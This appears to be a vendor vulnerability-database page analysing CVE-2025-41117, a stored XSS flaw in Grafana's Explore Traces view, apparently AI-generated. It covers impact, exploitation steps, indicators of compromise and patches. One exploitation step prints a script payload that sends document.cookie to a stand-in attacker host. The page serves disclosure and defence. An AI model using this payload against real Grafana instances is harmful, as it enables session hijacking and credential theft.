CVE-2025-41117
Grafana vulnerability analysis and mitigation

Overview

CVE-2025-41117 is a stored Cross-Site Scripting (XSS) vulnerability in Grafana's Explore Traces view, where stack traces can be rendered as raw HTML, enabling injection of malicious JavaScript in the browser. It affects Grafana versions 12.2.0 through 12.2.3 (fixed in 12.2.4) and 12.3.0 through 12.3.1 (fixed in 12.3.2), with security patch variants also released. Only datasources using the Jaeger HTTP API are affected; Jaeger gRPC and Tempo datasources are not impacted. The vulnerability was disclosed on February 12, 2026, and carries a CVSS v3.1 base score of 6.1 (Medium) (Red Hat Advisory, Grafana Advisory, Red Hat Bugzilla).

Technical details

The root cause is improper neutralization of user-supplied input during web page generation (CWE-79), specifically in the Explore Traces view's stack trace rendering logic. When Grafana retrieves stack trace data from a Jaeger HTTP API datasource, the content is rendered as raw HTML rather than being properly sanitized or escaped, allowing any embedded JavaScript to execute in the victim's browser. Exploitation requires that malicious JavaScript be present in the stack trace field — meaning an attacker must first be able to influence the data returned by the Jaeger HTTP API (e.g., by injecting a crafted trace). User interaction is required, as a victim must navigate to and view the affected stack trace in the Explore Traces view (Red Hat Bugzilla, Grafana Advisory).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of a victim's authenticated Grafana session, potentially leading to session hijacking, credential theft, and unauthorized actions within Grafana on behalf of the victim. The scope is changed (S:C in CVSS terms), meaning the impact extends beyond the vulnerable component to the user's browser environment. The attack surface is limited to organizations using Jaeger HTTP API datasources with the Explore Traces feature enabled, reducing the overall exposure compared to a universal XSS (Red Hat Advisory, Grafana Advisory).

Exploitability

There is no public proof-of-concept exploit code and no evidence of in-the-wild exploitation as of the disclosure date. The EPSS score is approximately 0.009% (0.000090), indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been reported (Red Hat Advisory, Grafana Advisory).

Exploitation steps

  1. Identify target environment: Confirm the target Grafana instance is running an affected version (12.2.0–12.2.3 or 12.3.0–12.3.1) and has a Jaeger HTTP API datasource configured with the Explore Traces feature accessible.
  2. Inject malicious payload into Jaeger trace data: Gain the ability to write or influence stack trace data returned by the Jaeger HTTP API — for example, by submitting a crafted trace with a stack trace field containing a JavaScript payload such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script>.
  3. Lure victim to the Explore Traces view: Social-engineer or wait for an authenticated Grafana user to navigate to the Explore Traces view and load the trace containing the malicious stack trace data.
  4. JavaScript executes in victim's browser: Because the stack trace is rendered as raw HTML without sanitization, the injected script executes in the victim's browser session, enabling session token theft, credential harvesting, or further actions within Grafana on behalf of the victim (Red Hat Bugzilla, Grafana Advisory).

Indicators of compromise

  • Network: Unexpected outbound HTTP requests from a Grafana user's browser to external domains (e.g., attacker-controlled servers) shortly after viewing the Explore Traces view; unusual GET/POST requests containing encoded cookie or session data in query parameters.
  • Logs: Grafana access logs showing repeated access to the Explore Traces endpoint (/explore) by multiple users in a short timeframe; Jaeger HTTP API responses containing HTML tags or JavaScript keywords (<script>, onerror=, javascript:) in stack trace fields.
  • Browser/Application: Browser developer console errors related to unexpected script execution or cross-origin requests when viewing Grafana Explore Traces; unexpected session invalidations or account activity following trace viewing.
  • File System / Jaeger Data: Presence of HTML or JavaScript content within stored Jaeger trace stack trace fields, detectable via audit of Jaeger trace storage (Grafana Advisory).

Mitigation and workarounds

Grafana has released patched versions: 12.2.4 (and 12.2.4-security-01) for the 12.2.x branch, and 12.3.2 (and 12.3.2-security-01) for the 12.3.x branch. Organizations should upgrade to these versions immediately. As a temporary workaround, restrict access to the Explore Traces feature to trusted users only, or migrate affected datasources from Jaeger HTTP API to Jaeger gRPC or Tempo, which are not affected by this vulnerability. Validate and sanitize stack trace data ingested from Jaeger HTTP API sources as an additional defensive measure (Grafana Advisory, Red Hat Advisory).

Community reactions

The vulnerability was noted in community CVE tracking channels, including Reddit's r/CVEWatch, where it appeared in trending CVE lists for February 12–13, 2026. The Grafana team published an official security advisory promptly on the disclosure date. No significant independent researcher commentary or major media coverage has been identified beyond standard vulnerability database aggregation (Grafana Advisory).

Additional resources


SourceThis report was generated using AI

Related Grafana vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-76844HIGH8.3
  • Grafana logoGrafana
  • grafana-elasticsearch
NoNoAug 24, 2026
CVE-2026-76172HIGH7.5
  • Grafana logoGrafana
  • aspnetcore-runtime-dbg-8.0
NoNoAug 24, 2026
CVE-2026-75975HIGH7.5
  • Grafana logoGrafana
  • cockpit-image-builder
NoNoAug 24, 2026
CVE-2026-17033MEDIUM6.8
  • Grafana logoGrafana
  • cpe:2.3:a:grafana:grafana
NoNoAug 24, 2026
CVE-2026-19197MEDIUM6.3
  • Grafana logoGrafana
  • cpe:2.3:a:grafana:grafana
NoYesAug 26, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management